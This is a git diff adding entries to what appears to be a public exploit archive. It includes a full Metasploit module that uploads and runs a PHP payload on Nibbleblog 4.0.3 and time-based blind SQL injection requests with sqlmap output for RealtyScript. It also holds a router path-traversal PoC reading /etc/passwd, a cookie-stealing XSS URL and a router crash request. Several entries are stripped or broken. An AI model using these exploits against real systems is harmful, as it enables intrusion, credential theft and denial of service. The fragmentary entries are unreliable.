diff --git a/files.csv b/files.csv
index 21a734b37..899d0abc8 100755
--- a/files.csv
+++ b/files.csv
@@ -34762,3 +34762,14 @@ id,file,description,date,author,platform,type,port
38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N and TL-WR741ND Routers Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0
38484,platforms/php/webapps/38484.rb,"Wordpress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability",2015-10-18,PizzaHatHacker,php,webapps,0
38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0
+38487,platforms/php/webapps/38487.txt,"WordPress Colormix Theme Multiple Security Vulnerablities",2013-04-21,MustLive,php,webapps,0
+38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08_ 1.00.09 - Path Traversal Vulnerability",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0
+38489,platforms/php/remote/38489.rb,"Nibbleblog File Upload Vulnerability",2015-10-19,metasploit,php,remote,0
+38490,platforms/multiple/dos/38490.txt,"Adobe Flash IExternalizable.writeExternal - Type Confusion",2015-10-19,"Google Security Research",multiple,dos,0
+38491,platforms/php/webapps/38491.php,"SMF 'index.php' HTML injection and Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0
+38492,platforms/hardware/remote/38492.html,"TP-Link TL-WR1043N Router Cross Site Request Forgery Vulnerability",2013-04-24,"Jacob Holcomb",hardware,remote,0
+38493,platforms/hardware/remote/38493.txt,"Cisco Linksys WRT310N Router Multiple Denial of Service Vulnerabilities",2013-04-23,"Carl Benedict",hardware,remote,0
+38494,platforms/php/webapps/38494.txt,"WordPress WP Super Cache Plugin Remote PHP Code Execution Vulnerability",2013-04-24,anonymous,php,webapps,0
+38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router Cross Site Request Forgery Vulnerability",2013-04-25,"Jacob Holcomb",hardware,remote,0
+38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple CSRF And Persistent XSS Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
+38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-based Blind SQL Injection Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
diff --git a/platforms/hardware/remote/38492.html b/platforms/hardware/remote/38492.html
new file mode 100755
index 000000000..4f88c8dda
--- /dev/null
+++ b/platforms/hardware/remote/38492.html
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/59442/info
+
+The TP-Link TL-WR1043N Router is prone to a cross-site request-forgery vulnerability.
+
+Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
+
+d> Cisco WRT310Nv2 Firmware v2.0.01 CSRF/XSS
\ No newline at end of file
diff --git a/platforms/hardware/remote/38493.txt b/platforms/hardware/remote/38493.txt
new file mode 100755
index 000000000..6c52d91a1
--- /dev/null
+++ b/platforms/hardware/remote/38493.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/59445/info
+
+The Cisco Linksys WRT310N Router is prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests.
+
+Successful exploits will cause the device to crash, denying service to legitimate users.
+
+http://www.example.com/apply.cgi?pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&url_address=my.wrt310n&lan_proto=dhcp&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=AAAAAAAAAAAAAAAAAAA&time_zone=-08+1+1&_daylight_time=1
\ No newline at end of file
diff --git a/platforms/hardware/remote/38495.html b/platforms/hardware/remote/38495.html
new file mode 100755
index 000000000..a22b1e748
--- /dev/null
+++ b/platforms/hardware/remote/38495.html
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/59476/info
+
+Belkin F5D8236-4 Router is prone to a cross-site request-forgery vulnerability.
+
+Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
+
+ Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.
\ No newline at end of file
diff --git a/platforms/hardware/webapps/38488.txt b/platforms/hardware/webapps/38488.txt
new file mode 100755
index 000000000..3d3e47746
--- /dev/null
+++ b/platforms/hardware/webapps/38488.txt
@@ -0,0 +1,29 @@
+# Title: Path Traversal Vulnerability
+# Product: Belkin Router N150
+# Author: Rahul Pratap Singh
+# Website: https://0x62626262.wordpress.com
+# Contact:
+ Linkedin: https://in.linkedin.com/in/rahulpratapsingh94
+ Twitter: @0x62626262
+# Vendor Homepage: http://www.belkin.com
+# Firmware Tested: 1.00.08, 1.00.09
+# CVE: 2014-2962
+
+Description:
+Belkin N150 wireless router firmware versions 1.00.07 and earlier contain a
+path traversal vulnerability through the built-in web interface. The
+webproc cgi
+module accepts a getpage parameter which takes an unrestricted file path as
+input. The web server runs with root privileges by default, allowing a
+malicious attacker to read any file on the system.
+
+A patch was released by Belkin but that is still vulnerable.
+
+POC:
+http://192.168.2.1/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
+#root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh
+#tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh
+
+Ref:
+https://www.kb.cert.org/vuls/id/774788
+https://0x62626262.wordpress.com/category/full-disclosure/
diff --git a/platforms/multiple/dos/38490.txt b/platforms/multiple/dos/38490.txt
new file mode 100755
index 000000000..1ef1abfa1
--- /dev/null
+++ b/platforms/multiple/dos/38490.txt
@@ -0,0 +1,13 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=547
+
+If IExternalizable.writeExternal is overridden with a value that is not a function, Flash assumes it is a function even though it is not one. This leads to execution of a 'method' outside of the ActionScript object's ActionScript vtable, leading to memory corruption.
+
+A sample swf is attached. ActionScript code is also attached, but it does not compile to the needed to swf. To get the PoC, decompress the swf using flasm -x myswf, and then search for "triteExternal" and change it to "writeExternal".
+
+This bug is in the AVM serializer (http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/AvmSerializer.cpp), and is type confusion when calling the method writeExternal, which is implemented when a class extends IExternalizable (http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/IExternalizable.html). The method is resolved on line 1437 of AvmSerializer.cpp by calling toplevel->getBinding, which does not guarantee that the binding is a method binding. It then gets cast to a method on line 773 and called, which is type confusion.
+
+One challenge with the bug is actually creating a SWF which can hit this code, as usually overriding a defined method will lead to an illegal override exception. The 0-day author did this differently than I did. The code where all class properties (methods, internal classes, variables, etc.) are resolved is in http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/Traits.cpp. You can see on line 813 that a check that no two properties of a class have the same name is commented out due to some legitimate SWFs doing that. This means that a SWF can have a variable with the same name as a method (overriding a method with less restrictive method is still illegal), which is how my PoC overrode the method. The 0-day did something slightly different, it put the redefinition of writeExternal in a different public namespace than the original definition of writeExternal. This has the benefit that the ActionScript will compile and hit the bug without modification.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38490.zip
+
diff --git a/platforms/php/remote/38489.rb b/platforms/php/remote/38489.rb
new file mode 100755
index 000000000..61d1216c8
--- /dev/null
+++ b/platforms/php/remote/38489.rb
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(
+ info,
+ 'Name' => 'Nibbleblog File Upload Vulnerability',
+ 'Description' => %q{
+ Nibbleblog contains a flaw that allows a authenticated remote
+ attacker to execute arbitrary PHP code. This module was
+ tested on version 4.0.3.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Unknown', # Vulnerability Disclosure - Curesec Research Team. Author's name?
+ 'Roberto Soares Espreto ' # Metasploit Module
+ ],
+ 'References' =>
+ [
+ ['URL', 'http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html']
+ ],
+ 'DisclosureDate' => 'Sep 01 2015',
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [['Nibbleblog 4.0.3', {}]],
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
+ OptString.new('USERNAME', [true, 'The username to authenticate with']),
+ OptString.new('PASSWORD', [true, 'The password to authenticate with'])
+ ], self.class)
+ end
+
+ def username
+ datastore['USERNAME']
+ end
+
+ def password
+ datastore['PASSWORD']
+ end
+
+ def check
+ cookie = do_login(username, password)
+ return Exploit::CheckCode::Detected unless cookie
+
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'admin.php'),
+ 'cookie' => cookie,
+ 'vars_get' => {
+ 'controller' => 'settings',
+ 'action' => 'general'
+ }
+ )
+
+ if res && res.code == 200 && res.body.include?('Nibbleblog 4.0.3 "Coffee"')
+ return Exploit::CheckCode::Appears
+ end
+ Exploit::CheckCode::Safe
+ end
+
+ def do_login(user, pass)
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'admin.php')
+ )
+
+ fail_with(Failure::Unreachable, 'No response received from the target.') unless res
+
+ session_cookie = res.get_cookies
+ vprint_status("#{peer} - Logging in...")
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'admin.php'),
+ 'cookie' => session_cookie,
+ 'vars_post' => {
+ 'username' => user,
+ 'password' => pass
+ }
+ )
+
+ return session_cookie if res && res.code == 302 && res.headers['Location']
+ nil
+ end
+
+ def exploit
+ unless [ Exploit::CheckCode::Detected, Exploit::CheckCode::Appears ].include?(check)
+ print_error("Target does not appear to be vulnerable.")
+ return
+ end
+
+ vprint_status("#{peer} - Authenticating using #{username}:#{password}")
+
+ cookie = do_login(username, password)
+ fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
+ vprint_good("#{peer} - Authenticated with Nibbleblog.")
+
+ vprint_status("#{peer} - Preparing payload...")
+ payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php"
+
+ data = Rex::MIME::Message.new
+ data.add_part('my_image', nil, nil, 'form-data; name="plugin"')
+ data.add_part('My image', nil, nil, 'form-data; name="title"')
+ data.add_part('4', nil, nil, 'form-data; name="position"')
+ data.add_part('', nil, nil, 'form-data; name="caption"')
+ data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"image\"; filename=\"#{payload_name}\"")
+ data.add_part('1', nil, nil, 'form-data; name="image_resize"')
+ data.add_part('230', nil, nil, 'form-data; name="image_width"')
+ data.add_part('200', nil, nil, 'form-data; name="image_height"')
+ data.add_part('auto', nil, nil, 'form-data; name="image_option"')
+ post_data = data.to_s
+
+ vprint_status("#{peer} - Uploading payload...")
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri, 'admin.php'),
+ 'vars_get' => {
+ 'controller' => 'plugins',
+ 'action' => 'config',
+ 'plugin' => 'my_image'
+ },
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'data' => post_data,
+ 'cookie' => cookie
+ )
+
+ if res && /Call to a member function getChild\(\) on a non\-object/ === res.body
+ fail_with(Failure::Unknown, 'Unable to upload payload. Does the server have the My Image plugin installed?')
+ elsif res && !( res.body.include?('Warning') || res.body.include?('warn') )
+ fail_with(Failure::Unknown, 'Unable to upload payload.')
+ end
+
+ vprint_good("#{peer} - Uploaded the payload.")
+
+ php_fname = 'image.php'
+ payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname)
+ vprint_status("#{peer} - Parsed response.")
+
+ register_files_for_cleanup(php_fname)
+ vprint_status("#{peer} - Executing the payload at #{payload_url}.")
+ send_request_cgi(
+ 'uri' => payload_url,
+ 'method' => 'GET'
+ )
+ end
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/38487.txt b/platforms/php/webapps/38487.txt
new file mode 100755
index 000000000..c01814397
--- /dev/null
+++ b/platforms/php/webapps/38487.txt
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/59371/info
+
+The Colormix theme for WordPress is prone to multiple security vulnerabilities, including:
+
+1. A cross-site scripting vulnerability
+2. A path-disclosure vulnerability
+3. Multiple content-spoofing vulnerabilities
+
+An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+Content spoofing:
+
+http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
+
+http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://www.example1.com
+
+http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
+
+http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
+
+Cross-site scripting:
+
+http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
\ No newline at end of file
diff --git a/platforms/php/webapps/38491.php b/platforms/php/webapps/38491.php
new file mode 100755
index 000000000..dd42f95e7
--- /dev/null
+++ b/platforms/php/webapps/38491.php
@@ -0,0 +1,42 @@
+source: http://www.securityfocus.com/bid/59409/info
+
+SMF is prone to an HTML-injection and multiple PHP code-injection vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the affected application and inject hostile HTML and script code into vulnerable sections of the application.
+
+SMF 2.0.4 is vulnerable; other versions may also be affected.
+
+'.$page;
+
+curl_close($ch); // to close 'logged-in' part
+
+?>
diff --git a/platforms/php/webapps/38494.txt b/platforms/php/webapps/38494.txt
new file mode 100755
index 000000000..8d14f758f
--- /dev/null
+++ b/platforms/php/webapps/38494.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/59470/info
+
+The WP Super Cache plugin for WordPress is prone to a remote PHP code-execution vulnerability.
+
+An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
+
+WP Super Cache 1.2 is vulnerable; other versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/38496.txt b/platforms/php/webapps/38496.txt
new file mode 100755
index 000000000..e40d2ffc4
--- /dev/null
+++ b/platforms/php/webapps/38496.txt
@@ -0,0 +1,183 @@
+
+RealtyScript v4.0.2 Multiple CSRF And Persistent XSS Vulnerabilities
+
+
+Vendor: Next Click Ventures
+Product web page: http://www.realtyscript.com
+Affected version: 4.0.2
+
+Summary: RealtyScript is award-winning real estate software that makes
+it effortless for a real estate agent, office, or entrepreneur to be
+up and running with a real estate web site in minutes. The software
+is in daily use on thousands of domain names in over 40 countries and
+has been translated into over 25 languages.
+
+Desc: The application allows users to perform certain actions via HTTP
+requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative
+privileges if a logged-in user visits a malicious web site. Multiple
+cross-site scripting vulnerabilities were also discovered. The issue
+is triggered when input passed via the multiple parameters is not
+properly sanitized before being returned to the user. This can be
+exploited to execute arbitrary HTML and script code in a user's browser
+session in context of an affected site.
+
+Tested on: Apache/2.4.6 (CentOS)
+ PHP/5.4.16
+ MariaDB-5.5.41
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2015-5269
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5269.php
+
+
+01.10.2015
+
+---
+
+
+Dork: "Powered by RealtyScript v4.0.2"
+
+
+--------------------
+Upload Stored XSS:
+POST parameter: file
+--------------------
+
+
+
+
+
+
+
+
+--------------
+CSRF Add User:
+--------------
+
+
+
+
+
+
+
+------------------------------
+CSRF Add SUPERUSER:
+Level SUPERUSER for SUPERUSER
+Level Global for Administrator
+------------------------------
+
+
+
+
+
+
+
+-----------------------------
+Stored XSS:
+POST parameter: location_name
+-----------------------------
+
+
+
+
+
+
+
+----------------------------
+IFRAME Injection Stored XSS:
+POST parameter: text
+----------------------------
+
+
+
+
+
diff --git a/platforms/php/webapps/38497.txt b/platforms/php/webapps/38497.txt
new file mode 100755
index 000000000..29970e333
--- /dev/null
+++ b/platforms/php/webapps/38497.txt
@@ -0,0 +1,104 @@
+
+RealtyScript v4.0.2 Multiple Time-based Blind SQL Injection Vulnerabilities
+
+
+Vendor: Next Click Ventures
+Product web page: http://www.realtyscript.com
+Affected version: 4.0.2
+
+Summary: RealtyScript is award-winning real estate software that makes
+it effortless for a real estate agent, office, or entrepreneur to be
+up and running with a real estate web site in minutes. The software
+is in daily use on thousands of domain names in over 40 countries and
+has been translated into over 25 languages.
+
+Desc: RealtyScript suffers from multiple SQL Injection vulnerabilities.
+Input passed via the GET parameter 'u_id' and the POST parameter 'agent[]'
+is not properly sanitised before being returned to the user or used in
+SQL queries. This can be exploited to manipulate SQL queries by injecting
+arbitrary SQL code.
+
+Tested on: Apache/2.4.6 (CentOS)
+ PHP/5.4.16
+ MariaDB-5.5.41
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2015-5270
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5270.php
+
+
+01.10.2015
+
+--
+
+
+(1)
+
+GET /admin/users.php?req=remove&u_id=103 and (select * from (select(sleep(66)))a)-- & HTTP/1.1
+
+
+(2)
+
+POST /admin/mailer.php HTTP/1.1
+Host: TARGET
+Content-Length: 62
+Cache-Control: max-age=0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Origin: http://TARGET
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Referer: http://TARGET/admin/mailer.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8
+Cookie: PHPSESSID=vaq21340scj2u53a1b96ehvid5;
+
+agent[]=102 and (select * from (select(sleep(67)))a)-- &subject=test&message=t00t^^&submit_mailer=Send
+
+
+
+
+====================================== .sqlmap session output =======================================
+
+$ sqlmap -r request1.txt -p "u_id" --dbms=MySQL --os=Linux --sql-query="SELECT @@version"
+ _
+ ___ ___| |_____ ___ ___ {1.0-dev-04c1d43}
+|_ -| . | | | .'| . |
+|___|_ |_|_|_|_|__,| _|
+ |_| |_| http://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal.
+
+[*] starting at 14:36:36
+
+[14:36:36] [INFO] parsing HTTP request from 'request1.txt'
+[14:36:36] [INFO] testing connection to the target URL
+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
+---
+Parameter: u_id (GET)
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
+ Payload: req=remove&u_id=103 AND (SELECT * FROM (SELECT(SLEEP(5)))YrMM)
+---
+[14:36:36] [INFO] testing MySQL
+[14:36:36] [INFO] confirming MySQL
+[14:36:36] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux CentOS
+web application technology: Apache 2.4.6, PHP 5.4.16
+back-end DBMS: MySQL >= 5.0.0
+[14:36:36] [INFO] fetching SQL SELECT statement query output: 'SELECT @@version'
+[14:36:36] [WARNING] time-based comparison requires larger statistical model, please wait..............................
+[14:36:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
+do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
+[14:37:03] [INFO] adjusting time delay to 2 seconds due to good response times
+5.5.41-MariaDB
+SELECT @@version: '5.5.41-MariaDB'
+[14:38:50] [INFO] fetched data logged to text files under '/.sqlmap/output/TARGET'
+
+[*] shutting down at 14:38:50
+
+======================================= sqlmap session output. ======================================